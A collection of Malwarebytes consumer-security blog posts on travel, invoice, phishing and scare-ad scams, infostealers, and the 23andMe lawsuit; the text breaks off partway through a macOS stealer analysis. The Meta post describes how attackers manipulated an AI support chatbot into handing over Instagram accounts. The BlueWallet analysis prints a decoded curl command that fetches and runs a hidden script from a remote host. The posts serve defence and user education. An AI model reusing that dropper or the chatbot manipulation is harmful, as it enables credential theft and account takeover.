Malware Bytes

Planning a holiday should be exciting, fun, and not a cybersecurity risk. But booking flights, hotels, and rental properties often means sharing sensitive personal and financial information across multiple platforms. Combined with frequent travel scams and recurring data breaches in the travel and hospitality sector, it creates plenty of opportunities for criminals.

This guide covers the most common risks when making travel reservations and explains how to avoid them. Save the adventure for your destination.

Travel bookings combine high-value payments with urgency and emotional decision-making. Attackers love that for several reasons:

• Large upfront payments make scams profitable.
• Booking confirmations often contain valuable personal data, such as names, travel dates, contact details, and sometimes passport information.
• Travelers are more likely to act quickly and overlook red flags.
• Travel and hospitality companies are frequent breach targets due to complex IT environments and third-party integrations.

Recent years have seen repeated breaches involving hotel chains, booking platforms, cruise operators, and airlines, exposing everything from email addresses to passport numbers.

Common travel-related scams Fake booking websites

Attackers create convincing clones of airline, hotel, and travel booking websites, often promoted through online ads or SEO poisoning (manipulating search engine results). Victims enter payment details, receive fake confirmations, and only discover the fraud later.

Last year we uncovered a campaign using fake Booking.com websites that tricked visitors into infecting their own devices with a Remote Access Trojan (RAT).

Phishing messages about reservation problems

Emails, texts, or messaging app notifications may claim there’s a problem with your booking and urge you to click a link, open an attachment, or call a number. The scammers often impersonate legitimate travel brands and may include real stolen data from previous breaches.

Earlier this year, we wrote about a Booking.com breach that provided scammers with a lot of useful information that could make their messages appear more convincing.

Vacation rental fraud

Scammers post fake listings or hijack legitimate ones on rental platforms. They typically encourage off-platform communication or payments to avoid built-in protections.

In 2024, one of our researchers encountered exactly this type of scam. A supposedly legitimate Airbnb listing in Amsterdam turned out to be fake, and the scammer sent an email claiming to be from TripAdvisor in an attempt to collect payment details.

“Too good to be true” deals

Deep discounts on flights or accommodation are used to lure victims into paying for offers that don’t exist.

If a deal seems unusually generous, look for the catch. Be especially cautious when advertisers claim the offer will end very soon. Creating urgency is one of the oldest tricks in the scammer playbook.

Scam or legit? Scam Guard knows.

TRY IT NOW

Booking.com impersonation scams

Booking.com has become an increasingly popular brand for scammers to impersonate. According to our—anonymized—Scam Guard data, we’ve recently seen:

• Fake cashback emails promising a €435 refund that lead to phishing websites
• In-app messages requesting an additional reservation fee
• Emails containing PDF attachments that require a “secure viewer,” which turns out to be malware
• WhatsApp messages claiming credit card details are missing and directing users to phishing sites
• Text messages linking to fake Booking.com pages and demanding card verification before a deadline

The number of scams impersonating Booking.com has been growing. Since the breach disclosed in April, Scam Guard data shows a 56% increase in Booking.com-related scams compared to the previous period, with weekly volume up consistently across five straight weeks.

How to book travel safely

There are a few simple things that can dramatically reduce your risk:

• Use secure payment methods. Credit cards offer better fraud protection than debit cards or bank transfers. Never pay anyone asking for payment in cryptocurrencies or gift cards.
• Stick to trusted platforms. Even though these are not guaranteed to be safe, using them is better than gambling on an unknown platform.
• Don’t click on sponsored search results. I cannot say this often enough.
• Verify the existence of the booked accommodation through other channels.
• Treat requests to move communication or payment to another platform as suspicious.
• Consider urgent language, unexpected attachments, and mismatched sender domains as red flags.
• Downloads needed to open an attachment are not to be trusted. These downloads often turn out to be malware. To block and remove malware, use an up-to-date, real-time anti-malware solution.

Pro tip: Malwarebytes Browser Guard will block known phishing websites and can even recognize suspicious websites that are not in our database yet.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.

Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.

How the trick worked

The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.

Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.

To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.

In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.

Meta hoisted on its own AI petard

Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.

The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.

Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.

What actually worked

Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.

Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.

What can you do to protect yourself?

A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.

That doesn’t make MFA perfect, but it adds an important layer of protection.

So the practical advice is unglamorous:

• Open Instagram’s Settings
• Navigate to your Meta Accounts Center
• Turn on Two-factor authentication. An authenticator app is better than SMS, but either is better than nothing.

Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.

Expect more snafus from “helpful” bots

This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.

The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.

Scammers don’t need to hack you. They just need you to click once. 

Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.

A new batch of fake payment invoices is being staged right now, and we caught the campaign while it was still being put together. The emails impersonate PayPal, Amazon, and Geek Squad, and others, and they all share one goal: to scare you into calling a phone number where a fake “support agent” is waiting.

What makes this wave unusual is that some of the templates we recovered still contained blank fields where the phone number and price should have been, while others were already complete and in circulation. We caught the campaign mid-rollout.

What’s the scam?

If you receive an email that looks like a receipt—“Your subscription renewed for $349,” “You sent a payment of $598.96”—and it tells you to call a number to cancel or dispute the charge, stop.

There is no charge. The email exists to get you on the phone with a scammer who will then try to talk you into handing over remote access to your computer, your card details, or a “refund” that somehow requires you to send them money.

This particular flavor is called a “phantom invoice” or “refund” scam, and the trick is psychological, not technical. That’s why these emails can often slip past spam filters: there’s often no malicious attachment or link for security systems to analyze. The scam is in the phone number you’re urged to call.

If you didn’t make the purchase, there’s no need to call the number in the email to cancel it. Real companies don’t pressure customers into resolving unexpected charges through unsolicited phone numbers.

The goal is simple: create enough concern to get you to call. You see a significant charge you don’t recognize, say $499, and your first instinct is to stop it. The invoice helpfully provides a number to call “if this wasn’t you.” So you call, and now you’re talking to the scammer.

From there, the conversation usually leads to one of a few outcomes. They may ask you to install software so they can “fix” the charge, giving them access to your computer. They may ask for your card or bank details to “process the refund.” Or they may “accidentally” refund too much and ask you to send the difference back, usually by gift card or bank transfer.

The invoice is just the bait, while the phone call is the trap.

These emails are convincing, and some are already reaching inboxes. The good news is that simply receiving one doesn’t put you at risk. The scam only works if it succeeds in getting you to call the number provided. If you recognize the message as fraudulent and delete it, the attack stops there.

If you did call the number and followed instructions from a scammer, run a virus scan and check your bank accounts. Change your critical passwords, enable multi-factor authentication (MFA), and make sure your security software is up to date.

How we caught it half-built

Most scam investigations start after the damage is done. This one was different. We came across a cluster of nearly identical invoice templates that were clearly part of the same kit, and several of them were incomplete.

Where a finished scam email would show a phone number, some of these showed the literal text #TFN# instead, which is just a placeholder. (“TFN” is the scammers’ shorthand for toll-free number, the callback line they route victims to.) Others left the price as #PRICE#, the date as #DATE#, and the recipient as #EMAIL#. These are merge fields—the blanks a bulk-sending tool fills in automatically before a campaign goes out.

Finding those placeholders still in place told us that the operation was still being assembled. Some templates were still half-finished, while others were already complete and carrying live callback numbers. We’d caught the campaign mid-rollout, between being built and fully launched.

Why these invoices look believable

The scammers use familiar brands such as PayPal, Amazon, and Geek Squad. They’re companies people expect to receive receipts and renewal notices from, which lowers suspicion.

The charges are also carefully chosen. Amounts in the few-hundred-dollar range are large enough to cause concern but still seem plausible as a subscription renewal or online purchase.

Many messages add urgency, telling recipients to call quickly to dispute or cancel the charge. This pressure is designed to stop people from verifying the transaction independently.

Some invoices even combine trusted brands, such as claiming a payment was sent through PayPal to Amazon. Referencing multiple well-known companies makes the message appear more credible.

How to spot a fake invoice

The good news is that these scams share warning signs. Once you know what to look for, they get a lot easier to catch. Watch for any of these:

• A charge you don’t remember making. If you don’t recognize the charge, verify it independently through your account or bank. If there’s no record of it, the invoice is likely a lure designed to get you to call.
• A ticking clock. “Call within 12 hours,” “cancel before it renews,” or “act immediately” provide fake urgency designed to stop you thinking. Real billing problems can wait while you check.
• Brands you trust, used as cover. The more familiar the logo, the less carefully people read. Scammers borrow trust they didn’t earn.
• Odd details that don’t quite fit. A PayPal email “from” Amazon, a stray address that belongs to no one, or slightly off wording. Trust the small things that feel wrong.
• Pressure to keep you on the phone. Once you call, a real company would never stop you from hanging up to verify, but a scammer will.

If even one of these is present, treat the whole message as suspicious.

Remember the single rule that defeats this entire scam: A genuine company will never rush you onto a call to undo a payment you never made. If you’re not sure whether a charge is real, close the email and check your account the normal way: by typing the company’s website into your browser yourself, or calling the number on the back of your bank card.

Pro tip: Malwarebytes Scam Guard can help spot scams like these and guide you in what to do next, while Browser Guard will block you from accessing scam websites.

What to do if one of these lands in your inbox

If you receive a suspicious invoice like the ones described here, take a few simple precautions:

• Don’t call the number. That’s the core of the scam. Legitimate refunds or cancellations don’t require you to call a number from an unsolicited receipt.
• Don’t reply or click anything. Treat the message as suspicious, even if it looks legitimate.
• Verify charges independently. If you’re concerned a charge might be real, log in directly to PayPal, your bank, or the retailer by typing the address yourself and reviewing your transaction history.
• Report it. Forward suspected phishing emails to the impersonated company’s abuse address and, in the US, report them to the FTC at reportfraud.ftc.gov. Reporting helps disrupt scam operations.
• If you already called, end the conversation. Don’t install any software they recommend. If you granted remote access or shared payment information, contact your bank immediately and run a trusted security scan on your device.
• Be wary of urgency. Phrases like “within 12 hours” or “cancel now” are designed to pressure you into acting before you think. Take the time to verify the claim independently.

Scammers are increasingly shifting to tactics that software can’t easily inspect. A phone number in an email is difficult for security tools to evaluate, and the actual scam happens over a phone call instead of through a malicious link or attachment.

That’s why finding this campaign during rollout matters. Instead of seeing the damage afterward, we got a look at the preparation: unfinished templates, incomplete details, and the scam kit before it was fully deployed.

The best defense is simple: if an unexpected invoice tells you to call a number immediately, stop and verify the charge independently first.

Indicators of compromise Domains

invoicepdfin[.]xyz

invoicepdfus[.]xyz

invoicepdfusa[.]xyz

invoicerep[.]xyz

invoicestatement[.]xyz

invoicestm[.]xyz

Callback numbers

804-392-2793

801-640-8589

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Have you ever gotten a phone call and had a gut feeling that those random digits looked extra suspicious? It happens to millions of people every day. While many people have trained themselves to ignore such calls, they still pose a threat across the US. In fact, scammers stole more than $21 billion from Americans last year, according to the latest IC3 report.

That’s why we created Scam Number Check.

Now, instead of risking a call with a scammer, you can look up a number and get a clear answer in seconds.

How to use Scam Number Check

We know scam calls happen every day, and they can cost victims a lot of money. So we designed Scam Number Check to be really simple to use. It’s free, private, and instant.

Here’s how:

• Go to Malwarebytes’ Scam Number Check and enter the phone number.
• If the number looks suspicious, you can choose whether to block or report it. Remember, reporting suspicious numbers helps protect others.

Understanding the results

Scam Number Check can provide one of three verdicts when you check a phone number. Here’s what each means and how you should proceed:

• Do not trust this number. Multiple people have flagged this number as a scam. Don’t call back, don’t share personal info, and don’t send money if they ask.
• This number seems safe. Based on available data, this number has not been associated with suspicious activity. It is our recommendation that you proceed with caution in this case.
• We don’t have enough info. No information is available in the threat intelligence database. This doesn’t mean it’s safe, so proceed with caution.

Why it matters

Scammers like to pile on the pressure and create fake urgency so you don’t have time to think. If you don’t recognize a number, let it go to voicemail first. Then check the number with Scam Number Check to see if it’s been linked to scams or suspicious activity. This simple extra step might help you avoid sharing personal information, sending money, or falling for impersonation scams.

Scams are getting harder to spot every day. By making Malwarebytes even better at catching threats, we’re helping you stay one step ahead of scammers and cybercriminals.

Don’t recognize that number? We’ll check it.

CHECK NOW

Phishing has changed. Slowly but surely, cybercriminals are turning to infostealers instead.

Traditional phishing hasn’t gone away. Far from it. But many attackers are no longer focused solely on tricking victims into entering usernames and passwords on fake login pages. Instead, they are using infostealers to quietly collect passwords, cookies, browser data, and other sensitive information from infected devices.

This approach is attractive because it scales well and reduces friction. Instead of relying on a victim to type credentials into a fake site, the malware can harvest logins already saved in browsers, session tokens, autofill data, cryptocurrency wallet details, and even files that contain useful information.

This makes the attack chain less visible. A traditional phishing email often leaves obvious clues: a suspicious link, a fake login page, or a strange attachment. Infostealers are different. They can arrive through malicious online ads (malvertising), cracked software, fake browser updates, game cheats, or dubious download sites, and once installed, they work in the background, stealing whatever the victim’s device has in store.

Part of this shift could be due to the widespread adoption of multi-factor authentication (MFA). By stealing session cookies, cybercriminals can bypass MFA, so they can access accounts without needing a password or authentication code.

Another factor is the rise of the malware-as-a-service (MaaS) ecosystem. Infostealers are cheap to deploy, easy to scale, and highly profitable. Rather than building a full attack chain themselves, many criminals buy access to ready-made stealer kits, loaders, or initial access services from underground vendors. This lowers the barrier to entry and allows less-skilled attackers to run credential theft operations.

In many cases, infostealers are just the first stage of a larger criminal operation. The stolen data is collected, packaged, and sold to other criminals interested in the harvested information. These buyers may specialize in fraud, account takeover, business email compromise, or ransomware. A single infected machine can generate multiple revenue streams: credentials for one buyer, session cookies for another, and corporate access or wallet data for a third.

That division of labor is one reason infostealers have become so persistent. Operators can update their code, rotate infrastructure, and launch new campaigns with minimal effort, while affiliates handle distribution through phishing, malvertising, fake downloads, or social media lures.

How to stay safe

Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

Pirated software, game cheats, and cracked tools remain some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A new scam is targeting people who publish Chrome extensions.

The scam arrives as an official-looking “copyright removal request” claiming your extension is about to be removed from the Chrome Web Store and that you have 48 hours to appeal.

It even looks personalized. After you enter your extension’s ID to “verify” it, the page pulls in your extension’s real name and icon. But it’s all part of a phishing attack designed to steal your Google username and password.

If attackers gain access to a developer account, they may be able to take over the extension, access developer resources, or potentially push malicious updates to users.

What’s actually going on

If you’ve published a Chrome extension, you might encounter a page that looks like an official Google notice warning that your extension is being removed for copyright infringement.

The page asks you to enter your extension ID, then displays your real extension details alongside a complaint number and countdown clock. It pressures you to sign in with Google to file an appeal before time runs out.

None of it is real. The page is not operated by Google. The complaint, deadline, and countdown are fabricated. The goal is to trick you into entering your Google username and password into a fake sign-in window controlled by the scammer.

The most important rule to remember: Genuine warnings about your extension appear in your Chrome Web Store developer dashboard, not on a third-party website.

Why scammers want developer accounts

Chrome extensions have access to users’ browsers, and they can be updated automatically.

If attackers gain control of a developer account, they may be able to modify an extension, access developer resources, or potentially distribute malicious updates to existing users.

That’s what makes developer accounts such attractive targets, and why scams like these are prevalent.

What the scam looks like

The page is hosted on a domain that has nothing to do with Google. In the version we analyzed, the site used the address dmca-chrome-extensions[.]click.

Despite that, it uses Google’s branding and presents itself as a “Chrome Web Store Developer Policy Center.”

The page first asks for the link or ID of your extension. That seems harmless, which is exactly why it works.

It uses your own extension to look convincing

After you enter your extension ID, the page briefly displays a “Looking up extension…” message and then builds a fake takedown notice around your real extension.

When we tested the scam with Malwarebytes Browser Guard, it displayed our genuine extension name, icon, and Chrome Web Store listing alongside the fake complaint.

The site is simply pulling publicly available information from your extension’s Chrome Web Store page. Anyone can see that information. The scammers use it to make the fake notice appear legitimate.

Everything else is invented.

The complaint number, “date received,” 48-hour deadline, countdown timer, and timeline of events are generated by the scam page itself.

The countdown is there to rush you

A red warning banner claims your extension will be permanently removed unless you act within 48 hours, and a clock counts down by the second. The whole layout pushes you toward one button: sign in with Google to “verify your identity” and file your appeal. 

The urgency is designed to create pressure so you react before taking the time to verify the claim.

The fake sign-in window

When you click “Continue to verification,” a Google sign-in window appears with a title bar, padlock, and address showing accounts.google.com.

It looks authentic, but it isn’t.

The “window” is actually part of the web page itself. The padlock and address are just graphics designed to look like a real browser window.

The scammers even tailor the appearance to match your operating system, showing Mac-style windows on macOS and Windows-style windows on Windows devices.

Anything typed into this fake sign-in form is sent directly to the scammers.

One giveaway is that the window cannot leave the browser page. Try dragging it to the edge of your screen and it stops at the browser border. Minimize the browser and it disappears as well.

Most importantly, your browser’s real address bar still shows the scam site’s address, not Google’s.

How to stay safe

The good news is that a few simple habits defeat this scam.

• Don’t trust the link. If you receive a warning about your extension, go directly to your Chrome Web Store developer dashboard and check there.
• Be suspicious of urgency. Legitimate policy processes don’t rely on countdown clocks to force immediate action.
• Check the address bar. A real Google sign-in page appears at accounts.google.com in your browser’s actual address bar.
• Test the window. If a sign-in window can’t be dragged outside the browser or disappears when the browser is minimized, it’s probably fake.
• Turn on stronger sign-in protection. Passkeys and hardware security keys make stolen passwords far less useful to attackers.
• Use security software with phishing and web protection. Our Browser Guard, which is also part of Malwarebytes Premium can help block malicious websites and phishing pages before you enter sensitive information.

This isn’t a crude phishing page. It uses your real extension details, mimics Google’s branding, and creates a convincing sense of urgency.

If you receive a warning about your extension, don’t follow the link and don’t race the countdown. Go directly to your Chrome Web Store developer dashboard and verify the claim there.

When in doubt, close the tab.

If you already entered your details

Act quickly.

• Change your Google password immediately from a trusted device.
• Sign out of all active sessions in your Google account security settings.
• Review connected apps and devices for anything unfamiliar.
• Turn on two-step verification, preferably using a passkey or security key.
• Check your Chrome Web Store listings for changes, uploads, or new versions you didn’t publish.

Indicators of Compromise (IOCs)

Domain

dmca-chrome-extensions[.]click

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

California has sued the former shell of DNA testing company 23andMe over alleged security failures and misleading statements surrounding its 2023 data breach.

On May 27, 2026, Attorney General Rob Bonta filed suit in San Francisco Superior Court against Chrome Holding Co., the company now handling 23andMe’s remaining assets following its bankruptcy.

California’s complaint accuses 23andMe of failing to implement reasonable security measures to protect sensitive data and alleges violations of several state privacy and consumer protection laws. It also accuses the company of making misleading statements about its security practices.

The 2023 breach used old-school credential-stuffing tactics against 23andMe’s login page. Attackers operated inside the systems for roughly five months without anyone noticing. The direct compromise was modest, affecting about 14,000 accounts, but that was all the attackers needed to steal the data of just under seven million customers.

The intruders pivoted from those accounts through DNA Relatives, the platform’s headline feature, which enabled people to determine who they were connected with through DNA similarity. The lawsuit alleges a critical coding error in that feature enabled the perpetrators to scrape data from millions of other users connected by biological kinship.

The victim-blaming defense became evidence

After the breach went public, 23andMe sent victims’ legal representatives a letter blaming users for reusing passwords from sites that had been compromised earlier. The exposed data, the company suggested, had been shared of the users’ own free will and would not cause “pecuniary harm.”

The harms stemming from genetic data theft extend far beyond financial losses, however. The genetic information that was stolen enabled thieves to determine an individual’s genetic origins.

The data was reportedly offered for sale on the dark web with this information as a selling point, enabling sellers to offer records on Asian American Pacific Islander (AAPI) or Jewish customers, for example. Bonta’s office pointed out that antisemitic violence was on the rise at the time.

In spite of the letter’s attempt to blame users, only about 14,000 accounts were directly compromised through password reuse. The rest of the data was allegedly exposed through 23andMe’s own product. According to the complaint, the coding error in DNA Relatives exposed the data of anyone who had opted into the service, not just those linked to the 14,000 compromised accounts.

Can the state recover damages?

California is seeking statutory penalties ranging from $1,000 to $7,500 per violation. With 855,541 Californians among the affected users, the costs could mount up quickly.

The question is how much of it the state will collect if it wins its case. 23andMe filed for Chapter 11 bankruptcy in March 2025, then sold most of its assets, including the genomic data of more than 15 million customers, to TTAM Research Institute, a nonprofit founded by former 23andMe CEO Anne Wojcicki. California and several other states opposed the sale on Genetic Information Privacy Act grounds, but a federal bankruptcy judge approved it. The states are now appealing that decision.

Chrome Holding Co., the corporate shell that remains of 23andMe, received $305 million from that sale. But others have already been picking over what’s left.

Other regulators have already had their turn. The UK Information Commissioner’s Office fined 23andMe £2.31 million in June last year following a joint investigation with the Privacy Commissioner of Canada. A federal court initially approved a $30 million class-action settlement covering most US customer claims. That settlement later grew to $50 million and received final approval in January 2026.

What customers can do

If you tested with 23andMe, the standard breach hygiene still applies. Reset any password you reused on other sites and turn on multi-factor authentication wherever it’s offered. Credential stuffing only works on usernames and passwords that have already been exposed elsewhere. Also watch for phishing attacks that name-drop 23andMe or the breach itself. And maybe weigh the benefits of using DNA testing services against the security risks.

Because there’s one part of this that no fine and no settlement can solve: stolen genetic data sold on the dark web cannot be taken back. Passwords can be changed. DNA can’t.

Browse like no one’s watching. 

Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free → 

Sometimes it happens. You’re happily playing a game on your phone or laptop when suddenly alarms pop up out of nowhere:

“Your device is infected!”

“Your iCloud is full!”

“Your account is restricted for watching porn!”

Some games can be played for free if you agree to watch ads, and in others you can get extra lives, perks, or boosters by watching ads. That’s fine, as long as you’re given a choice and the ads are legitimate.

Unfortunately, cybercriminals sometimes manage to buy advertising space and use it to defraud gamers.

Let’s look at some examples.

The iCloud storage scam, or its OneDrive equivalent, is a well-known and long-running scam that claims you need to expand your storage or all your files will be deleted. The websites these messages link to come in many forms, but they all ask for personal and payment details to complete the upgrade.

“Your account has been restricted.
We have detected that your device has been hacked after visiting adult websites.
Solution:
1:Click the “OK” button below;

2:You will be redirected to App Store;

3:Install and open the app, then run the cleanup program.”

This ad is a scam and uses a classic scare tactic. It falsely claims your device has been hacked and tries to pressure you into clicking “OK” and installing a cleanup app.

Messages like this sometimes claim to be from your ISP, a “Security Department,” or a generic “Safety Center.”

“Apple Security Alert
8 viruses have been detected on your iPhone. Now iOS is damaged by 72%. Further damage to the system will result in device lockup and loss of all data within two minutes.
Please click the button below to remove all viruses.”

This is another fake warning, commonly used by scammers to trick users into clicking links or downloading unnecessary or harmful software. Apple doesn’t send alerts like this, and these messages use vague threats to get your attention.

What kind of app you’re really installing if you follow the instructions depends on your device and your location. If you’re “lucky,” it’s just adware, but you might just as easily end up with an infostealer.

In many cases, you’ll end up with fleeceware, a type of deceptive mobile app where developers lure users in with short free trials that quickly convert into hidden subscription fees, sometimes costing hundreds of dollars per month. These apps often offer some functionality to stay on the barely legal side of things, but at wildly inflated prices.

How to stay safe

The best response to these messages is simply to ignore them.

Real system alerts come from the OS, not from inside a game window or browser tab. Here’s a simple test: If you can switch apps and the “warning” disappears with the browser/game, it was not a system‑level alert.

Check the destination URLs before proceeding. Apple, Google, and major ISPs use predictable domains. A familiar-looking URL is not proof that a message is legitimate, but if the URL looks suspicious, it should definitely be treated as a scam.

Scam or legit? Scam Guard knows.

TRY IT NOW

You may arrive at something that looks like the official App Store or Google Play Store. Be wary of lookalike app stores and unofficial download sites, but if you are on the real store, the app is generally safer to install. However, it’s still worth checking reviews, permissions, and the developer before proceeding.

Visit the official website of the organization the message claims to be from and log in there. If there’s a genuine problem with your account, storage, or device, you’ll find information about it through official channels.

Use an up-to-date, real-time anti-malware solution on your devices that can detect and block malicious apps.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.

If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses..

That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.

Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.

If you did run it, treat the machine as compromised and follow the steps below.

What to do if you may have run it

If you opened the file and pressed play, assume your device was compromised and work through these steps:

• Disconnect the machine from the network to cut the control channel
• Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled
• From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges
• Move any cryptocurrency to a new wallet created on a clean device
• Treat existing seed phrases and keys as exposed
• Before sending crypto in future, verify the full destination address character by character
• Check for and remove unfamiliar files in ~/Library/LaunchAgents
• Look for a hidden .sysupd.sh file in /tmp
• Rotate cloud and SSH credentials if .ssh, .aws, or .gnupg files were present on the machine
• When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

Social engineering tricks

The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.

The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.

As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.

That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”

In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.

Technical analysis Stage one: The AppleScript downloader

The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.

The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.

Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

The page walks the victim through the exact motions needed to run the file.

On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.

This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.

The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

Decoded, that command does this:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.

The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.

Stage two: Payload analysis

The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.

Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.

That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.

One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.

Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.

What the malware steals

The second stage’s collection routines are sweeping. They pull from six broad categories.

1. Web browsers

The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:

• Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex
• Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf
